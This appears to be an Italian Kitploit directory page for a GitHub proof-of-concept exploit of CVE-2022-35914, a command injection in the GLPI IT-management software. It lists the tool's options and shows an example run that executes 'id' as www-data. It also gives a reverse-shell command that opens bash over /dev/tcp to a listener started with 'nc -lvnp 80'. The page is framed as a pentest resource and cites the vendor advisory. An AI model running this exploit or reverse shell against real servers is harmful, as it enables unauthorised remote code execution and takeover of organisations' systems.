Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/senderend/cve-2022-35914
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubsenderend/cve-2022-35914

CVE-2022-35914

Exploit PoC per GLPI - Iniezione di comandi tramite uno script di una libreria di terze parti

Vedi Repository
431 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-35914 PoC

Riferimenti

  • https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
  • https://github.com/cosad3s/CVE-2022-35914-poc (Crediti a Sébastien Copin per il PoC che ho adattato qui)

Dai un'occhiata al mio report completo qui: https://link.medium.com/tBwDlpQl3Ib

Utilizzo

root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
python3 CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL [-c CMD] [-f HOOK] [-b CALLBACK] [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Command injection using a third-party library script

options:
  -h, --help                  show this help message and exit
  -u URL                      URL to test
  -c CMD                      Command to launch (default: id)
  -f HOOK                     PHP hook function (default: array_map)
  -b CALLBACK                 PHP callback function (default: system)
  --check                     Just check, no command execution.
  --user-agent USER_AGENT     Custom User-Agent

Esempio:

root@kitploit:~
python3 CVE-2022-35914.py -u http://glpi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell:

root@kitploit:~
python3 CVE-2022-35914.py -u http://192.168.249.242 -c 'bash -c "bash -i >& /dev/tcp/192.168.45.154/80 0>&1"'

nc -lvnp 80
Scarica lo strumento